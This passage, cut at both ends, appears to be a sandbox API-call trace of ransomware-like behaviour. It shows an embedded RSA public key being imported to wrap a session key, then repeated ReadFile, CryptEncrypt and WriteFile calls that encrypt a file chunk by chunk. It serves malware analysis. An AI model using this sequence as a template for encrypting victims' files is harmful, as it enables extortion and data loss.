KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0279.902] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0279.902] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2e0a0) returned 1 [0279.902] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2e0a0, dwCertEncodingType=0x1, pInfo=0x2f36c80*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f36cb0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f36cb8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fbd48) returned 1 [0279.904] CryptEncrypt (in: hKey=0x2fbd48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0279.904] CryptEncrypt (in: hKey=0x2fbd48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f1e4d0*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f1e4d0*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0279.904] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f1e4d0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f1e4d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0279.905] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.908] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.908] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.909] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.910] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.910] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.910] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.910] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.910] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.910] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.910] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.911] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.911] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.911] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.911] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.911] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.911] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.911] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.911] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.911] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.911] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.911] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.911] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.912] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.912] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.912] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.912] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.912] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.912] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.912] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.912] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.912] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.912] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.913] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.913] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.913] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.913] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.913] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.913] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.913] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.913] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.913] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.913] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.913] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.913] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.914] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.914] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.914] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.914] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.914] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.914] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.914] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.914] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.914] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.914] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.914] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.914] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.914] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.915] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.915] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.915] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.915] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.915] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.915] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.915] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.915] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.915] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.915] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.915] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.915] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.915] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.916] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.916] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.916] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.916] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.916] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.916] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.916] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.916] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.916] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.916] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.916] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.916] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.916] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.917] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.917] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.917] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.917] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.917] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, 